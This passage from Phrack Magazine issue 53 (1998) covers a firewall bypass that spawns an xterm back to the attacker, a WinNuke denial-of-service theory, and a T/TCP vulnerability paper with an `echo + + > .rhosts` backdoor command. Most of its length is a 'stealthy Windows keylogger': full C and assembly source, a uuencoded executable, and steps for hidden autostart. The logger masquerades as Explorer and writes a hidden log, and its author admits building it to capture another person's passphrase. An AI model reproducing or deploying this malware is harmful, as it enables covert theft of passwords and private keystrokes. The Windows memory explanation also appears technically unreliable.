hackers, this information is often given during a controlled penetration. If you are a malicious 'black hat' evil hacker, then trashing or Social Engineering might be an option. you --. firewall (external interface) --. firewall (internal interface) --. | .-- internal host1 --' | `-- internal host2 --. | firewall (internal interface) --' firewall (external interface) --' you --' Taking it to the next level: So if you find this works, what else can you do? Have a remote sendmail attack lying around? Can you run a command on a remote machine? Know what an xterm is? Firewalls often allow a wide variety of traffic to go outbound. So route a remote sendmail based attack to the internal host of your choice, spawn an xterm to your terminal and voila. You just bypassed a firewall! Conclusion: Yup. That is it. Short and sweet. No need to put excess words in this article as you are probably late on your hourly check of rootshell.com looking for the latest scripts. Expand your minds. Hi: mea_culpa mea_culpa@sekurity.org * "taking it to the next level" is a bastardized trademark of MC. * 'wacky white hat ethical hacker' is probably a trademark of IBM. * 'malicious black hat evil hacker' is a trademark of the ICSA. 0x8>------------------------------------------------------------------------- Resource Hacking and Windows NT/95 by Lord Byron With the release of Windows NT service pack 3 the infamous Winnuke denial of service attacks are rendered useless. At least that is what they lead you to believe. This is not the case. To understand why we need to delve into a little background on the internals of Windows; more specifcally, the way that Windows allocates memory. This is the undying problem. To better understand the problems with Windows memory allocation you have to go very deep within the operating system, to what is commonly called the "thunking layer". This layer is what allows Windows to call both 16 and 32-bit functions on the same function stack. If you make a TCP/IP-type function call or (if you are a database person) an ODBC function call you are calling a pseudo 32-bit function. Yes, both of these direct drivers are 32-bit drivers but they rely upon 16-bit code to finish their process. Once you enter one of these drivers all the data is passed into that driver. Windows also requires all drivers to run at the level 0 level within the Windows kernel. These drivers then pass off the data to different 16-bit functions. The difficulty with passing off 32-bit data to a 16-bit function is where the thunking layer comes into the picture. The thunking layer is a wrapper around all 16-bit functions in Windows that can be called by a 32-bit function. It thunks the data calls down to 16-bit by converting them into multiple data elements normally done by a structure or by passing the actual memory dump of the variable and passing the data dump into the function. Then the function does its processing to the data within the data-gram and passes it back out of the function. At this point it goes back through the thunking layer and reconverts the data back to a 32-bit variable and then the 32-bit driver keeps on with its processing. This processing of the thunking layer is not an unheard of scheme nor has it not been used before but with the way that we all know that Microsoft codes it was done in a hurry, not properly implemented, and never tested till production. Do to the aforementioned reasons it should not surprise to anyone that the code has severe memory leaks. This is why if you, for example, make an ODBC call to an Oracle database long enough that eventually your Windows box becomes slower until an eventual crash "Blue Screen of Death" or just becomes unbearable to work with. As Microsoft tries to patch these bugs in the device drivers it releases service packs such as SP3. The way that Microsoft has developed and implements the device driver process is on a modular code basis. So when a patch is implemented it actually calls the modulated code to handle the exact situation for that exploit. Now that you know some of the basic internals as to how Windows makes its calls it is time to understand resource hacking and the reason Win-nuke still works. If you ping a Windows box it allocates a certain amount of ram and runs code within the driver that returns the ICMP packet. Well if you ping a windows box 20,000 or 30,000 times it has to allocate 20 or 30 thousand chunks of memory to run the device driver to return the ICMP packet. Once 20 or 30 thousand little chunks of memory out there you do not have enough memory to run allow the TCP/IP driver to spawn the code to handle normal function within the Windows box. At this point if you were to run Win-nuke to send the OOB packet to port 139 on a Windows box in would crash the box. The OOB code that was used to patch Win-nuke in SP3 could not be spawned due to the lack of memory available and thus uses the original code for the TCP/IP.sys so it gets processed by the standard TCP/IP driver that was original shipped with Windows without the fix. The only way for Microsoft to actually fix this problem would be to rewrite the TCP/IP driver with the correct code within it as the core driver (instead of writing patches to be spawned when the exception occurs). In doing this though would require Microsoft a significant amount of coding skill and talent which we know that no self respecting coder would ever work for the big evil. 0x9>------------------------------------------------------------------------- ----[ PDM Phrack Doughnut Movie (PDM) last issue was `Grosse Point Blank`. PDM52 recipients: Jim Broome Jonathan Ham Jon "Boyracer" George James Hanson Jesse Paulsen jcoest All the recipients have J* first names. Eerie. And what is actually involved in `boyracing`? Do they put little saddles on them? PDM53 Challenge: "...Remember, ya always gotta put one in the brain. The first one puts him down, the second one finishes him off. Then he's dead. Then we go home." ----[ EOF -------------------------------------------------------------------------------- ----[ Phrack -------------------------------------------------------------------------------- ---[ Phrack -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 06 of 15 -------------------------[ T/TCP vulnerabilities --------[ route|daemon9 <route@infonexus.com> ----[ Introduction and Impetus T/TCP is TCP for Transactions. It is a backward compatible extension for TCP to facilitate faster and more efficient client/server transactions. T/TCP is not in wide deployment but it is in use (see appendix A) and it is supported by a handful of OS kernels including: FreeBSD, BSDi, Linux, and SunOS. This article will document the T/TCP protocol in light detail, and then cover some weaknesses and vulnerabilities. ----[ Background and primer TCP is a protocol designed for reliability at the expense of expediency (readers unfamiliar with the TCP protocol are directed to the ancient-but- still-relevant:). Whenever an application is deemed to require reliability, it is usually built on top of TCP. This lack of speed is considered a necessary evil. Short lived client/server interactions desiring more speed (short in terms of time vs. amount of data flow) are typically built on top of UDP to preserve quick response times. One exception to this rule, of course, is http. The architects of http decided to use the reliable TCP transport for ephemeral connections (indeed a poorly designed protocol). T/TCP is a small set of extensions to make a faster, more efficient TCP. It is designed to be a completely backward compatible set of extensions to speed up TCP connections. T/TCP achieves its speed increase from two major enhancements over TCP: TAO and TIME_WAIT state truncation. TAO is TCP Accelerated Open, which introduces new extended options to bypass the 3-way handshake entirely. Using TAO, a given T/TCP connection can approximate a UDP connection in terms of speed, while still maintaining the reliability of a TCP connection. In most single data packet exchanges (such is the case with transactional-oriented connections like http) the packet count is reduced by a third. The second speed up is TIME_WAIT state truncation. TIME_WAIT state truncation allows a T/TCP client to shorten the TIME_WAIT state by up to a factor of 20. This can allow a client to make more efficient use of network socket primitives and system memory. ----[ T/TCP TAO TCP accelerated open is how T/TCP bypasses the 3-way handshake. Before we discuss TAO, we need to understand why TCP employs a 3-way handshake. According to RFC 793, the principal reason for the exchange is the prevention of old duplicate connection initiations wandering into current connections and causing confusion. With this in mind, in order to obviate the need for the 3-way handshake, there needs to be a mechanism for the receiver of a SYN to guarantee that that SYN is in fact new. This is accomplished with a new extended TCP header option, the connection count (CC). The CC (referred as tcp_ccgen when on a host) is a simple monotonic variable that a T/TCP host keeps and increments for every TCP connection created on that host. Anytime a client host supporting T/TCP wishes to make a T/TCP connection to a server, it includes (in it's TAO packet) a CC (or CCnew) header option. If the server supports T/TCP, it will cache that client's included CC value and respond with a CCecho option (CC values are cached by T/TCP hosts on a per host basis). If the TAO test succeeds, the 3-way handshake is bypassed, otherwise the hosts fall back to the older process. The first time a client host supporting T/TCP and a server host supporting T/TCP make a connection no CC state exists for that client on that server. Because of this fact, the 3-way handshake must be done. However, also at that time, the per host CC cache for that client host is initialized, and all subsequent connections can use TAO. The TAO test on the server simply checks to make sure the client's CC is greater then the last received CC from that client. Consider figure 1 below: Client Server T ----------------------------------------------------------------------- i 0 --TAO+data--(CC = 2)--> ClientCC = 1 m 1 2 > 1; TAO test succeeds e 2 accept data ---> (to application) [ fig 1 ] Initially (0) the client sends a TAO encapsulated SYN to the server, with a CC of 2. Since the CC value on the server for this client is 1 (indicating they have had previous T/TCP-based communication) the TAO test succeeds (1). Since the TAO test was successful, the server can pass the data to application layer immediately (2). If the client's CC had not been greater than the server's cached value, the TAO test would have failed and forced the 3-way handshake. ----[ T/TCP TIME_WAIT truncation Before we can see why it is ok to shorten the TIME_WAIT state, we need to cover exactly what it is and why it exists. Normally, when a client performs an active close on a TCP connection, it must hold onto state information for twice the maximum segment lifetime (2MSL) which is usually between 60 - 240 seconds (during this time, the socket pair that describes the connection cannot be reused). It is thought that any packet from this connection would be expired (due to IP TTL constraints) from the network. TCP must be consistent with its behavior across all contingencies and the TIME_WAIT state guarantees this consistency during the last phase of connection closedown. It keeps old network segments from wandering into a connection and causing problems and it helps implement the 4-way closedown procedure. For example, if a wandering packet happens to be a retransmission of the servers FIN (presumably due to the clients ACK being lost), the client must be sure to retransmit the final ACK, rather then a RST (which it would do if it had torn down all the state). T/TCP allows for the truncation of the TIME_WAIT state. If a T/TCP connection only lasts for MSL seconds or less (which is usually the case with transactional-oriented connections) the TIME_WAIT state is truncated to as little as 12 seconds (8 times the retranmission timeout - RTO). This is allowable from a protocol standpoint because of two things: CC number protection against old duplicates and the fact that the 4-way closedown procedure packet loss scenario (see above) can be handled by waiting for the RTO (multiplied by a constant) as opposed to waiting for a whole 2MSL. As long as the connection didn't last any longer then MSL, the CC number in the next connection will prevent old packets with an older CC number from being accepted. This will protect connections from old wandering packets (if the connection did last longer, it is possible for the CC values to wrap and potentially be erroneously delivered to a new incarnation of a connection). ----[ Dominance of TAO It is easy for an attacker to ensure the success or failure of the TAO test. There are two methods. The first relies on the second oldest hacking tool in the book. The second is more of a brutish technique, but is just as effective. --[ Packet sniffing If we are on the local network with one of the hosts, we can snoop the current CC value in use for a particular connection. Since the tcp_ccgen is incremented monotonically we can precisely spoof the next expected value by incrementing the snooped number. Not only will this ensure the success of our TAO test, but it will ensure the failure of the next TAO test for the client we are spoofing. --[ The numbers game The other method of TAO dominance is a bit rougher, but works almost as well. The CC is an unsigned 32-bit number (ranging in value from 0 - 4,294,967,295). Under all observed implementations, the tcp_ccgen is initialized to 1. If an attacker needs to ensure the success of a TAO connection, but is not in a position where s/he can sniff on a local network, they should simply choose a large value for the spoofed CC. The chances that one given T/TCP host will burn through even half the tcp_ccgen space with another given host is highly unlikely. Simple statistics tells us that the larger the chosen tcp_ccgen is, the greater the odds that the TAO test will succeed. When in doubt, aim high. ----[ T/TCP and SYN flooding TCP SYN flooding hasn't changed much under TCP for Transactions. The actual attack is the same; a series of TCP SYNs spoofed from unreachable IP addresses. However, there are 2 major considerations to keep in mind when the target host supports T/TCP: 1) SYN cookie invalidation: A host supporting T/TCP cannot, at the same time, implement SYN cookies. TCP SYN cookies are a SYN flood defense technique that works by sending a secure cookie as the sequence number in the second packet of the 3-way handshake, then discarding all state for that connection. Any TCP options sent would be lost. If the final ACK comes in, only then will the host create the kernel socket data structures. TAO obviously cannot be used with SYN cookies. 2) Failed TAO processing result in queued data: If the TAO test fails, any data included with that packet will be queued pending the completion of the connection processing (the 3-way handshake). During a SYN flood, this can make the attack more severe as memory buffers fill up holding this data. In this case, the attacker would want to ensure the failure of the TAO test for each spoofed packet. In a previous Phrack Magazine article, the author erroneously reported that T/TCP would help to alleviate SYN flood vulnerability. This obviously incorrect statement was made before copious T/TCP research was done and is hereby rescinded. My bad. ----[ T/TCP and trust relationships An old attack with a new twist. The attack paradigm is still the same, (readers unfamiliar with trust relationship exploitation are directed to P48-14) this time, however, it is easier to wage. Under T/TCP, there is no need to attempt to predict TCP sequence numbers. Previously, this attack required the attacker to predict the return sequence number in order to complete the connection establishment processing and move the connection into the established state. With T/TCP, a packet's data will be accepted by the application as soon as the TAO test succeeds. All the attacker needs to do is ensure that the TAO test will succeed. Consider the figure below. Attacker Server Trusted ----------------------------------------------------------------------- 0 -spoofed-TAO-> 1 TAO test succeeds T 2 data to application i 3 ---TAO-response-> m 4 no open socket e 5 <------RST------- 6 tears down connection [ fig 2 ] The attacker first sends a spoofed connection request TAO packet to the server. The data portion of this packet presumably contains the tried and true non-interactive backdooring command `echo + + > .rhosts`. At (1) the TAO test succeeds and the data is accepted (2) and passed to application (where it is processed). The server then sends its T/TCP response to the trusted host (3). The trusted host, of course, has no open socket (4) for this connection, and responds with the expected RST segment (5). This RST will teardown the attacker's spoofed connection (6) on the server. If everything went according to plan, and the process executing the command in question didn't take too long to run, the attacker may now log directly into the server. To deal with (5) the attacker can, of course, wage some sort of denial of service attack on the trusted host to keep it from responding to the unwarranted connection. ----[ T/TCP and duplicate message delivery Ignoring all the other weaknesses of the protocol, there is one major flaw that causes the T/TCP to degrade and behave decidedly NONTCP-like, therefore breaking the protocol entirely. The problem is within the TAO mechanism. Certain conditions can cause T/TCP to deliver duplicate data to the application layer. Consider the timeline in figure 3 below: Client Server ----------------------------------------------------------------------- 0 --TAO-(data)---> 1 TAO test succeeds T 2 accept data ---> (to application) i 3 *crash* (reboot) m 4 timeout (resends) --TAO-(data)---> e 5 TAO test fails (data is queued) 6 established <-SYN-ACK(SYN)-- fallback to 3WHS 7 --ACK(SYN)-----> established (data --> application) [ fig 3 ] At time 0 the client sends its TAO encapsulated data to the server (for this example, consider that both hosts have had recent communication, and the server has defined CC values for the client). The TAO test succeeds (1) and the server passes the data to the application layer for processing (2). Before the server can send its response however (presumably an ACK) it crashes (3). The client receives no acknowledgement from the server, so it times out and resends its packet (4). After the server reboots it receives this retransmission, this time, however, the TAO test fails and the server queues the data (5). The TAO test failed and forced a 3-way handshake (6) because the servers CC cache was invalidated when it rebooted. After completing the 3-way handshake and establishing a connection, the server then passes the queued data to the application layer, for a second time. The server cannot tell that it has already accepted this data because it maintains no state after a reboot. This violates the basic premise of T/TCP that it must remain completely backward compatible with TCP. ----[ In closing T/TCP is a good idea that just wasn't implemented properly. TCP was not designed to support a connectionless-like paradigm while still maintaining reliability and security (TCP wasn't even designed with security in mind at all). T/TCP brings out too many problems and discrete bugs in TCP to be anything more then a novelty. ----[ Appendix A: Internet hosts supporting RFC 1644 This information is ganked from Richard Steven's T/TCP homepage (). It is not verfied to be correct. - - - - - - - ----[ Appendix B: Bibliography 1) Braden, R. T. 1994 "T/TCP - TCP Extensions for Transactions...", 38 p 2) Braden, R. T. 1992 "Extending TCP for Transactions - Concepts...", 38 p 3) Stevens, W. Richard. 1996 "TCP Illustrated volume III", 328 p 4) Smith, Mark. 1996, "Formal verification of Communication...", 15 p ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 07 of 15 -------------------------[ A Stealthy Windows Keylogger --------[ markj8@usa.net I recently felt the need to acquire some data being typed into Windows95 machines on a small TCP-IP network. I had occasional physical access to the machines and I knew the remote administration password, but the files were being saved in BestCryptNP volumes, the passphrase for which I didn't know... I searched the Net as best I could for a suitable keylogging program that would allow me to capture the passphrase without being noticed, but all I could find was I big boggy thing written in visual basic that insisted on opening a window. I decided to write my own. I wanted to write it as a VXD because they run at Privilege Level 0 and can do just about ANYTHING. I soon gave up on this idea because I couldn't acquire the correct tools and certainly couldn't afford to buy them. While browsing through the computer section of my local public library one day I noticed a rather thin book called "WINDOWS ASSEMBLY LANGUAGE and SYSTEMS PROGRAMMING" by Barry Kauler, (ISBN 0 13 020207 X) c 1993. A quick flick through the Table of Contents revealed "Chapter 10: Real-Time Events, Enhanced Mode Hardware Interrupts". I immediately borrowed the book and photocopied it (Sorry about the royalties Barry). As I read chapter 10 I realized that all I needed was a small 16 bit Windows program running as a normal user process to capture every keystroke typed into windows. The only caveat was that keystrokes typed into DOS boxes wouldn't be captured. Big deal. I could live without that. I was stunned to discover that all user programs in Windows share a single Interrupt Descriptor Table (IDT). This implies that if one user program patches a vector in the IDT, then all other programs are immediately affected. The only tool I had for generating windows executables was Borland C Ver 2.0 which makes small and cute windows 3.0 EXE's, so that's what I used. I have tested it on Windows for Workgroups 3.11, Windows 95 OSR2, and Windows 98 beta 3. It will probably work on Windows 3.x as well. As supplied, it will create a hidden file in the \WINDOWS\SYSTEM directory called POWERX.DLL and record all keystrokes into it using the same encoding scheme as Doc Cypher's KEYTRAP3.COM program for DOS. This means that you can use the same conversion program, CONVERT3.C, to convert the raw scancodes in the log file to readable ASCII. I have included a slightly "improved" version of CONVERT3.C with a couple of bugs fixed. I contemplated incorporating the functionality of CONVERT3 into W95Klog, but decided that logging scancodes was "safer" that logging plain ASCII. If the log file is larger that 2 megabytes when the program starts, it will be deleted and re-created with length zero. When you press CTRL-ALT-DEL (in windows95/98) to look at the Task List, W95Klog will show up as "Explorer". You can change this by editing the .DEF file and recompiling, or by HEX Editing the .EXE file. If anyone knows how to stop a user program from showing on this list please tell me. To cause the target machine to run W95Klog every time it starts Windows you can: 1) Edit win.ini, [windows] section to say run=WHLPFFS.EXE or some such confusing name :) Warning! This will cause a nasty error message if WHLPFFS.EXE can't be found. This method has the advantage of being able to be performed over the network via "remote administration" without the need for both computers to be running "remote registry service". 2) Edit the registry key: (Win95/98) `HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run` and create a new key called whatever you like with a string value of "WHLPFFS.EXE" or whatever. This is my preferred method because it is less likely to be stumbled upon by the average user and windows continues without complaint if the executable can't be found. The log file can be retrieved via the network even when it is still open for writing by the logging program. This is very convenient ;). <++> EX/win95log/convert.c // // Convert v3.0 // Keytrap logfile converter. // By dcypher <dcypher@mhv.net> // MSVC++1.52 (Or Borland C 1.01, 2.0 ...) // Released: 8/8/95 // // Scancodes above 185(0xB9) are converted to "<UK>", UnKnown. // #include <stdio.h> #define MAXKEYS 256 #define WS 128 const char *keys[MAXKEYS]; void main(int argc,char *argv[]) { FILE *stream1; FILE *stream2; unsigned int Ldata,Nconvert=0,Yconvert=0; char logf_name[100],outf_name[100]; // // HERE ARE THE KEY ASSIGNMENTS !! // // You can change them to anything you want. // If any of the key assignments are wrong, please let // me know. I havn't checked all of them, but it looks ok. // // v--- Scancodes logged by the keytrap TSR // v--- Converted to the string here keys[1] = "<uk>"; keys[2] = "1"; keys[3] = "2"; keys[4] = "3"; keys[5] = "4"; keys[6] = "5"; keys[7] = "6"; keys[8] = "7"; keys[9] = "8"; keys[10] = "9"; keys[11] = "0"; keys[12] = "-"; keys[13] = "="; keys[14] = "<bsp>"; keys[15] = "<tab>"; keys[16] = "q"; keys[17] = "w"; keys[18] = "e"; keys[19] = "r"; keys[20] = "t"; keys[21] = "y"; keys[22] = "u"; keys[23] = "i"; keys[24] = "o"; keys[25] = "p"; keys[26] = "["; /* = ^Z Choke! */ keys[27] = "]"; keys[28] = "<ret>"; keys[29] = "<ctrl>"; keys[30] = "a"; keys[31] = "s"; keys[32] = "d"; keys[33] = "f"; keys[34] = "g"; keys[35] = "h"; keys[36] = "j"; keys[37] = "k"; keys[38] = "l"; keys[39] = ";"; keys[40] = "'"; keys[41] = "`"; keys[42] = "<LEFT SHIFT>"; // left shift - not logged by the tsr keys[43] = "\\"; // and not converted keys[44] = "z"; keys[45] = "x"; keys[46] = "c"; keys[47] = "v"; keys[48] = "b"; keys[49] = "n"; keys[50] = "m"; keys[51] = ","; keys[52] = "."; keys[53] = "/"; keys[54] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr keys[55] = "*"; // and not converted keys[56] = "<alt>"; keys[57] = " "; // now show with shift key // the TSR adds 128 to the scancode to show shift/caps keys[1+WS] = "["; /* was "<unknown>" but now fixes ^Z problem */ keys[2+WS] = "!"; keys[3+WS] = "@"; keys[4+WS] = "#"; keys[5+WS] = "$"; keys[6+WS] = "%"; keys[7+WS] = "^"; keys[8+WS] = "&"; keys[9+WS] = "*"; keys[10+WS] = "("; keys[11+WS] = ")"; keys[12+WS] = "_"; keys[13+WS] = "+"; keys[14+WS] = "<shift+bsp>"; keys[15+WS] = "<shift+tab>"; keys[16+WS] = "Q"; keys[17+WS] = "W"; keys[18+WS] = "E"; keys[19+WS] = "R"; keys[20+WS] = "T"; keys[21+WS] = "Y"; keys[22+WS] = "U"; keys[23+WS] = "I"; keys[24+WS] = "O"; keys[25+WS] = "P"; keys[26+WS] = "{"; keys[27+WS] = "}"; keys[28+WS] = "<shift+ret>"; keys[29+WS] = "<shift+ctrl>"; keys[30+WS] = "A"; keys[31+WS] = "S"; keys[32+WS] = "D"; keys[33+WS] = "F"; keys[34+WS] = "G"; keys[35+WS] = "H"; keys[36+WS] = "J"; keys[37+WS] = "K"; keys[38+WS] = "L"; keys[39+WS] = ":"; keys[40+WS] = "\""; keys[41+WS] = "~"; keys[42+WS] = "<LEFT SHIFT>"; // left shift - not logged by the tsr keys[43+WS] = "|"; // and not converted keys[44+WS] = "Z"; keys[45+WS] = "X"; keys[46+WS] = "C"; keys[47+WS] = "V"; keys[48+WS] = "B"; keys[49+WS] = "N"; keys[50+WS] = "M"; keys[51+WS] = "<"; keys[52+WS] = ">"; keys[53+WS] = "?"; keys[54+WS] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr keys[55+WS] = "<shift+*>"; // and not converted keys[56+WS] = "<shift+alt>"; keys[57+WS] = " "; printf("\n"); printf("Convert v3.0\n"); // printf("Keytrap logfile converter.\n"); // printf("By dcypher <dcypher@mhv.net>\n\n"); printf("Usage: CONVERT infile outfile\n"); printf("\n"); if (argc==3) { strcpy(logf_name,argv[1]); strcpy(outf_name,argv[2]); } else { printf("Enter infile name: "); scanf("%99s",&logf_name); printf("Enter outfile name: "); scanf("%99s",&outf_name); printf("\n"); } stream1=fopen(logf_name,"rb"); stream2=fopen(outf_name,"a+b"); if (stream1==NULL || stream2==NULL) { if (stream1==NULL) printf("Error opening: %s\n\a",logf_name); else printf("Error opening: %s\n\a",outf_name); } else { fseek(stream1,0L,SEEK_SET); printf("Reading data from: %s\n",logf_name); printf("Appending information to..: %s\n",outf_name); while (feof(stream1)==0) { Ldata=fgetc(stream1); if (Ldata>0 && Ldata<186) { if (Ldata==28 || Ldata==28+WS) { fputs(keys[Ldata],stream2); fputc(0x0A,stream2); fputc(0x0D,stream2); Yconvert++; } else fputs(keys[Ldata],stream2); Yconvert++; } else { fputs("<UK>",stream2); Nconvert++; } } } fflush(stream2); printf("\n\n"); printf("Data converted....: %i\n",Yconvert); printf("Data not converted: %i\n",Nconvert); printf("\n"); printf("Closeing infile: %s\n",logf_name); printf("Closeing outfile: %s\n",outf_name); fclose(stream1); fclose(stream2); } <--> <++> EX/win95log/W95Klog.c /* * W95Klog.C Windows stealthy keylogging program */ /* * This will ONLY compile with BORLANDC V2.0 small model. * For other compilers you will have to change newint9() * and who knows what else :) * * Captures ALL interesting keystrokes from WINDOWS applications * but NOT from DOS boxes. * Tested OK on WFW 3.11, Win95 OSR2 and Win98 Beta 3. */ #include <windows.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <dos.h> //#define LOGFILE "~473C96.TMP" //Name of log file in WINDOWS\TEMP #define LOGFILE "POWERX.DLL" //Name of log file in WINDOWS\SYSTEM #define LOGMAXSIZE 2097152 //Max size of log file (2Megs) #define HIDDEN 2 #define SEEK_END 2 #define NEWVECT 018h // "Unused" int that is used to call old // int 9 keyboard routine. // Was used for ROMBASIC on XT's // Change it if you get a conflict with some // very odd program. Try 0f9h. /************* Global Variables in DATA SEGment ****************/ HWND hwnd; // used by newint9() unsigned int offsetint; // old int 9 offset unsigned int selectorint; // old int 9 selector unsigned char scancode; // scan code from keyboard //WndProc char sLogPath[160]; int hLogFile; long lLogPos; char sLogBuf[10]; //WinMain char szAppName[]="Explorer"; MSG msg; WNDCLASS wndclass; /***************************************************************/ // //__________________________ void interrupt newint9(void) //This is the new int 9 (keyboard) code // It is a hardware Interrupt Service Routine. (ISR) { scancode=inportb(0x60); if((scancode<0x40)&&(scancode!=0x2a)) { if(peekb(0x0040, 0x0017)&0x40) { //if CAPSLOCK is active // Now we have to flip UPPER/lower state of A-Z only! 16-25,30-38,44-50 if(((scancode>15)&&(scancode<26))||((scancode>29)&&(scancode<39))|| ((scancode>43)&&(scancode<51))) //Phew! scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program }//if CAPSLOCK if(peekb(0x0040, 0x0017)&3) //if any shift key is pressed... scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program if(scancode==26) //Nasty ^Z bug in convert program scancode=129; //New code for "[" //Unlike other Windows functions, an application may call PostMessage // at the hardwareinterrupt level. (Thankyou Micr$oft!) PostMessage(hwnd, WM_USER, scancode, 0L); //Send scancode to WndProc() }//if scancode in range asm { //This is very compiler specific, & kinda ugly! pop bp pop di pop si pop ds pop es pop dx pop cx pop bx pop ax int NEWVECT // Call the original int 9 Keyboard routine iret // and return from interrupt } }//end newint9 //This is the "callback" function that handles all messages to our "window" //_____________________________________________________________________ long FAR PASCAL WndProc(HWND hwnd,WORD message,WORD wParam,LONG lParam) { //asm int 3; //For Soft-ice debugging //asm int 18h; //For Soft-ice debugging switch(message) { case WM_CREATE: // hook the keyboard hardware interupt asm { pusha push es push ds // Now get the old INT 9 vector and save it... mov al,9 mov ah,35h // into ES:BX int 21h push es pop ax mov offsetint,bx // save old vector in data segment mov selectorint,ax // / mov dx,OFFSET newint9 // This is an OFFSET in the CODE segment push cs pop ds // New vector in DS:DX mov al,9 mov ah,25h int 21h // Set new int 9 vector pop ds // get data seg for this program push ds // now hook unused vector // to call old int 9 routine mov dx,offsetint mov ax,selectorint mov ds,ax mov ah,25h mov al,NEWVECT int 21h // Installation now finished pop ds pop es popa } // end of asm //Get path to WINDOWS directory if(GetWindowsDirectory(sLogPath,150)==0) return 0; //Put LOGFILE on end of path strcat(sLogPath,"\\SYSTEM\\"); strcat(sLogPath,LOGFILE); do { // See if LOGFILE exists hLogFile=_lopen(sLogPath,OF_READ); if(hLogFile==-1) { // We have to Create it hLogFile=_lcreat(sLogPath,HIDDEN); if(hLogFile==-1) return 0; //Die quietly if can't create LOGFILE } _lclose(hLogFile); // Now it exists and (hopefully) is hidden.... hLogFile=_lopen(sLogPath,OF_READWRITE); //Open for business! if(hLogFile==-1) return 0; //Die quietly if can't open LOGFILE lLogPos=_llseek(hLogFile,0L,SEEK_END); //Seek to the end of the file if(lLogPos==-1) return 0; //Die quietly if can't seek to end if(lLogPos>LOGMAXSIZE) { //Let's not fill the harddrive... _lclose(hLogFile); _chmod(sLogPath,1,0); if(unlink(sLogPath)) return 0; //delete or die }//if file too big } while(lLogPos>LOGMAXSIZE); break; case WM_USER: // A scan code.... *sLogBuf=(char)wParam; _write(hLogFile,sLogBuf,1); break; case WM_ENDSESSION: // Is windows "restarting" ? case WM_DESTROY: // Or are we being killed ? asm{ push dx push ds mov dx,offsetint mov ds,selectorint mov ax,2509h int 21h //point int 09 vector back to old pop ds pop dx } _lclose(hLogFile); PostQuitMessage(0); return(0); } //end switch //This handles all the messages that we don't want to know about return DefWindowProc(hwnd,message,wParam,lParam); }//end WndProc /**********************************************************/ int PASCAL WinMain (HANDLE hInstance, HANDLE hPrevInstance, LPSTR lpszCmdParam, int nCmdShow) { if (!hPrevInstance) { //If there is no previous instance running... wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = WndProc; //function that handles messages // for this window class wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = NULL; wndclass.hCursor = NULL; wndclass.hbrBackground = NULL; wndclass.lpszClassName = szAppName; RegisterClass (&wndclass); hwnd = CreateWindow(szAppName, //Create a window szAppName, / //ShowWindow(hwnd,nCmdShow); //We don't want no //UpdateWindow(hwnd); // stinking window! while (GetMessage(&msg,NULL,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } }//if no previous instance of this program is running... return msg.wParam; //Program terminates here after falling out } //End of WinMain of the while() loop. <--> <++> EX/win95log/W95KLOG.DEF ;NAME is what shows in CTRL-ALT-DEL Task list... hmmmm NAME Explorer DESCRIPTION 'Explorer' EXETYPE WINDOWS CODE PRELOAD FIXED DATA PRELOAD FIXED SHARED HEAPSIZE 2048 STACKSIZE 8096 <--> <++> EX/win95log/W95KLOG.EXE.uue begin 600 W95KLOG.EXE M35H"`08````$``\`__\``+@`````````0``````````````````````````` M````````````````````D````+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R M86T@;75S="!B92!R=6X@=6YD97(@36EC<F]S;V9T(%=I;F1O=W,N#0HD```` M````````````3D4%"FT``@```````@,"```(H!\```$````"``(``@`,`$`` M4`!0`%P`8`#_```````)`````@@!``<``````P(`U05`#=4%!@`F`F$,)@(( M17AP;&]R97(````!``@```9+15).14P$55-%4@``"$5X<&QO<F5R```````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````````)K__P``"\!U`^G$ M`(P&%@")'AP`B38:`(D^&`")%AX`N/__4)K__P``,\`>%C8!HS0! M@SXV`?]U#H,^-`'_=0<STC/`Z:``@SXV`2!\,7\'@SXT`0!V*/\V.`&:__\` M`&H`:@%H1`'H?@&#Q`9H1`'H+P)$1`O`=`8STC/`ZVB#/C8!('X#Z3W_=4J# M/C0!`'8#Z3'_ZSZ*1@JB.@%J`6@Z`?\V.`'H#P*#Q`;K)U(>BQ8P`8X>Y`&X M"27-(1]:_S8X`9K__P``:@":__\``#/2,\#K$O]V#E;_=@K_=@C_=@::__\` M`%X?74W*"@!5B^Q6BW8,@WX*`'0#Z98`QP86`0,`C`X:`<<&&`'__\<&'`$` M`,<&'@$``(DV(`''!B(!``#'!B0!``#'!B8!``",'BX!QP8L`50`'F@6`9K_ M_P``'FA4`!YH5`!HSP!J`&@`@&@`@&@`@&@`@&H`:@!6:@!J`)K__P``HQ0! MZQ(>:`(!FO__```>:`(!FO__```>:`(!:@!J`&H`FO__```+P'7;H08!7EW" M"@!5B^Q=PU6+[.L*BQYX`-'C_Y?F`:%X`/\.>``+P'7K_W8$Z!#\65W#58OL M@SYX`"!U!;@!`.L3BQYX`-'CBT8$B8?F`?\&>``SP%W#58OLBTX(M$.*1@:+ M5@3-(7(#D>L$4.@"`%W#58OL5HMV!`OV?!6#_EA^`[Y7`(DVH@"*A*0`F(OP MZQ&+QO?8B_"#_B-_Y<<&H@#__XDV$`"X__]>7<("`%6+[(M>!-'C@:=Z`/_] MM$**1@J+7@2+3@B+5@;-(7("ZP50Z)W_F5W#58OL5E?\BWX$'@>+US+`N?__ 